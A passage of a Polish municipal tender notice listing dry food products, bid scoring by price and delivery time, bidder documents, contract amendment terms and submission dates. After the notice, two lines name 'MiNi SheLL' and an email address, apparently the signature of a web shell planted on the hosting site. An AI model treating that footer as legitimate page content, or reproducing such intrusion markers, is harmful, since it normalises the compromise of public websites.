cukier, kwasek cytrynowy, mąka pszenna, mąka ziemniaczana, ekstrakt drożdżowy)	szt.	8<br/>przyprawa do ryb – 1kg<br/>(skład co najmniej: warzywa suszone, papryka, pieprz czarny, curry, imbir, rozmaryn, sól)	szt.	1<br/>rosół wołowy pasta – 1kg<br/>(skład co najmniej: cebula (1%), kurkuma, nasiona selera sól, tłuszcz palmowy, ekstrakty drożdżowe, aromaty, olej słonecznikowy)	szt.	4<br/>bulion grzybowy pasta – 1kg<br/>(skład co najmniej: koncentrat soku z pieczarek 2,3%, borowiki suszone 1,8%, sól, laktoza, ekstrakty drożdżowe, skrobia kukurydziana, fruktoza, sos sojowy)	szt. 1<br/>papryka słodka mielona – 1kg szt. 1<br/>papryka ostra mielona – 1kg	szt.	1<br/>oregano – 0,2kg	szt. 1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15890000-3 - Różne produkty spożywcze i produkty suszone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami<br/>oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60%<br/>2. Czas dostawy towaru 40%<br/>Razem 100%<br/>Kryterium CENA [C]<br/>CENA – 60%<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej.<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>NAJNIŻSZA CENA ZE WSZYSTKICH<br/>C = ------------------------------------------------- x 60 = ILOŚĆ PUNKTÓW<br/>CENA OFERTY BADANEJ<br/>Kryterium CZAS dostawy TOWARU (T)<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium Czas dostawy towaru.<br/>W przypadku zaoferowania przez wykonawcę czasu dostawy towaru do zmawiającego może uzyskać od 5 do 40 pkt.<br/>Zamawiający uznaje za korzystny CZAS DOSTAWY TOWARU: godziny 7:00-09:00 w dniach pracy kuchni.<br/>Wskazane godziny dostawy w tym przedziale będzie skutkowało przyznaniem 40 pkt w ramach kryterium CZAS DOSTAWY<br/>TOWARU:<br/>a) Oferta, w której zadeklarowany zostanie czas do 1 godzin od wskazanego czasu – 30 pkt<br/>b) Oferta, w której zadeklarowany zostanie czas do 2 godzin od wskazanego czasu – 20 pkt<br/>c) Oferta, w której zadeklarowany zostanie czas do 3 godzin od wskazanego czasu – 10 pkt<br/>d) Oferta, w której zadeklarowany zostanie czas do 4 godzin od wskazanego czasu – 5 pkt<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów czas dostawy towaru (maks.40)<br/>Opis sposobu obliczenia łącznej oceny ofert:<br/>Łączna ocena punktowa (Ł) oferty zostanie obliczona według formuły Ł = C + T<br/>Gdzie:<br/>C – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia,<br/>T – ilość punktów przyznanych Wykonawcy w kryterium „Czas dostawy towaru”.<br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz ilości punktów przyznanych w<br/>kryterium „CZAS DOSTAWY TOWARU”.<br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób określony powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do<br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty lub innych<br/>składanych dokumentów lub oświadczeń w tym zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE VIII - Artykuły spożywcze suche w opakowaniach jednostkowych: <br/>smalec – 200g kostka	szt. 450<br/>bułka tarta – 0,5kg szt. 350<br/>cukier kryształ kg 350<br/>cukier wanilinowy – 32g	szt. 25<br/>chrzan – 300g (korzeń chrzanu min. 71%)	szt. 25<br/>groch łupany – 0,5kg szt. 90<br/>jajko ( L)	szt. 3600<br/>kawa inka	szt. 20<br/>ryż długoziarnisty – 1kg	szt. 200<br/>kasza jęczmienna – 1kg	kg 140<br/>kasza gryczana – 1kg	kg 120<br/>kukurydza konserwowa – 400ml.	szt. 120<br/>kwasek cytrynowy – 20g szt. 150<br/>liść laurowy – 6g szt.	100<br/>majonez – 700ml <br/>(skład co najmniej: olej rzepakowy, żółtka jaja 6%, ocet, musztarda, cukier, przyprawy, sól, regulator kwasowości; typu Winiary lub równoważny)	szt.	40<br/>przyprawa do flaków – 20g <br/>(skład co najmniej: cebula, marchew, papryka słodka, pasternak, pieprz czarny, majeranek 2,2%, liść laurowy, imbir, gałka muszkatołowa, kolendra, ostra papryka, kurkuma, cukier, sól, hydrolizat białka sojowego; typu Prymat lub równoważna )	szt. 35<br/>ogórek konserwowy – 0,9l	szt. 220<br/>mąka pszenna typ 500 – 1kg kg 300<br/>mąka ziemniaczana – 0,5kg	szt. 8<br/>musztarda saperska – 200g	szt. 30<br/>olej rzepakowy – 1l	szt. 250<br/>pieprz czarny mielony 15g	szt. 180<br/>pieprz ziołowy – 30g	szt. 80<br/>sól kuchenna – 1kg	kg 300<br/>majeranek – 16g szt. 70<br/>sok-syrop – 500ml szt. 300<br/>przyprawa warzywna do potraw – 200g <br/>(skład co najmniej: warzywa suszone min. 15,5%, marchew, pasternak, ziemniak, cebula, natka pietruszki, korzeń selera, por, kapusta, korzeń pietruszki, pomidor, czosnek, papryka słodka, pieprz czarny, skrobia, sól; typu Vegeta, Kucharek lub równoważna)	szt. 450<br/>ziele angielskie – 15g	szt. 110<br/>herbata granulowana – 100g szt. 20<br/>susz owocowy – 100g	szt. 25<br/>kisiel owocowy – 40g	szt. 750<br/>groszek konserwowy – 400 ml puszka	szt. 20<br/>grzyby suszone – 20g	szt. 25<br/>ketchup – 1l	szt. 5<br/>ocet – 1l	szt. 6<br/>szczaw w słoiku – 0.9l szt.	45<br/>sos sałatkowo-koperkowy – 8g <br/>(skład co najmniej: liść kopru, cebula, gorczyca, szczypiorek, bazylia, oregano, kurkuma, pieprz biały, olej rzepakowy, kwas cytrynowy, cukier, sól )	szt.	100 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami<br/>oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60%<br/>2. Czas dostawy towaru 40%<br/>Razem 100%<br/>Kryterium CENA [C]<br/>CENA – 60%<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej.<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>NAJNIŻSZA CENA ZE WSZYSTKICH<br/>C = ------------------------------------------------- x 60 = ILOŚĆ PUNKTÓW<br/>CENA OFERTY BADANEJ<br/>Kryterium CZAS dostawy TOWARU (T)<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium Czas dostawy towaru.<br/>W przypadku zaoferowania przez wykonawcę czasu dostawy towaru do zmawiającego może uzyskać od 5 do 40 pkt.<br/>Zamawiający uznaje za korzystny CZAS DOSTAWY TOWARU: godziny 7:00-09:00 w dniach pracy kuchni.<br/>Wskazane godziny dostawy w tym przedziale będzie skutkowało przyznaniem 40 pkt w ramach kryterium CZAS DOSTAWY<br/>TOWARU:<br/>a) Oferta, w której zadeklarowany zostanie czas do 1 godzin od wskazanego czasu – 30 pkt<br/>b) Oferta, w której zadeklarowany zostanie czas do 2 godzin od wskazanego czasu – 20 pkt<br/>c) Oferta, w której zadeklarowany zostanie czas do 3 godzin od wskazanego czasu – 10 pkt<br/>d) Oferta, w której zadeklarowany zostanie czas do 4 godzin od wskazanego czasu – 5 pkt<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów czas dostawy towaru (maks.40)<br/>Opis sposobu obliczenia łącznej oceny ofert:<br/>Łączna ocena punktowa (Ł) oferty zostanie obliczona według formuły Ł = C + T<br/>Gdzie:<br/>C – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia,<br/>T – ilość punktów przyznanych Wykonawcy w kryterium „Czas dostawy towaru”.<br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz ilości punktów przyznanych w<br/>kryterium „CZAS DOSTAWY TOWARU”.<br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób określony powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do<br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty lub innych<br/>składanych dokumentów lub oświadczeń w tym zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Kompletna oferta zawiera:<br/>- Formularz ofertowy – wg wzoru stanowiącego załącznik nr 1 do SWZ.<br/>- Formularz cenowy - specyfikacja dostaw wg wzoru stanowiącego załączniki od nr 1A - 1H do SWZ.<br/>- Oświadczenie o niepodleganiu wykluczeniu - zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ (art. 125 ust.1<br/>ustawy Pzp). Oświadczenie to stanowi dowód potwierdzający brak podstaw do wykluczenia na dzień składania ofert.<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy - jeżeli w imieniu<br/>wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów [Wykonawca nie jest<br/>zobowiązany do złożenia dokumentów - odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru – potwierdzających umocowania do jego<br/>reprezentowania jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.]<br/>Warunek ten dotyczy również odpowiednio osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia publicznego oraz podwykonawców. Pełnomocnictwo to musi w swej treści jednoznacznie<br/>wskazywać uprawnienie do podpisania oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oferta przedstawiona przez dwóch lub więcej Wykonawców (współpartnerów) wchodzących w skład konsorcjum lub spółki cywilnej musi być przedstawiona, jako jedna oferta, od jednego podmiotu i spełniać następujące wymagania:<br/>a. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika (lidera) do reprezentowania ich w publicznego. Umocowanie należy przedłożyć wraz z ofertą – treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br/>b. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem (liderem).<br/>c. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, zostanie wybrana, zamawiający zastrzega możliwość żądania przed zawarciem umowy w sprawie zamówienia publicznego, przedłożenia umowy regulującej współpracę tych Wykonawców.<br/>d. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>e. wypełniając formularz oferty, jak również inne dokumenty powołujące się na „Wykonawcę” należy wpisać dane dotyczące wszystkich współpartnerów, a nie ich pełnomocnika – lidera lub jednego ze współpartnerów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do niniejszej umowy,<br/>pod rygorem nieważności takiej zmiany. <br/>Zmiany wysokości cen jednostkowych towarów objętych niniejszą umową: <br/>a.	zmiany cen jednostkowych towarów brutto w stosunku do cen określonych w umowie na pisemny wniosek Wykonawcy w przypadku, gdy ceny rynkowe towarów będących przedmiotem niniejszej umowy wzrosną o co najmniej 20%. Wzrost cen rynkowych Wykonawca jest zobowiązany udokumentować, wykazując wzrost cen od grudnia 2023r. do danego miesiąca na podstawie wskaźników cen towarów i usług konsumpcyjnych publikowanych przez Prezesa GUS. <br/>b.	wysokość wzrostu cen jednostkowych, w przypadku o którym mowa powyżej, ustalana jest wspólnie przez strony umowy. Wzrost cen poszczególnych produktów nie może być wyższy niż 10% w stosunku do ceny określonej w ofercie przedstawionej przez Wykonawcę przy zawarciu umowy; <br/>c.	zmiana cen z przyczyn określonych powyżej może nastąpić wyłącznie jeden raz w trakcie obowiązywania umowy i nie wcześniej niż po upływie 6 miesięcy od dnia zawarcia umowy. Zmiana obowiązywać będzie od dnia zawarcia aneksu do umowy podpisanego przez obie strony; <br/>Dokonana w oparciu o klauzulę waloryzacyjną zmiana wysokości cen /wartości umowy/ może dotyczyć wyłącznie dostaw pozostałych do wykonania na dzień dokonania zawiadomienia o zmianie.<br/><br/>Zmiany nie mogą naruszać postanowień zawartych w art. 455 ust. 1 ustawy Prawo zamówień publicznych. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w<br/>zakresie uregulowanym w art. 454-455 Pzp. oraz wskazanym w projektowanych postanowieniach umowy stanowiącym <br/>Załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://um-krasnystaw.zetopzp.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com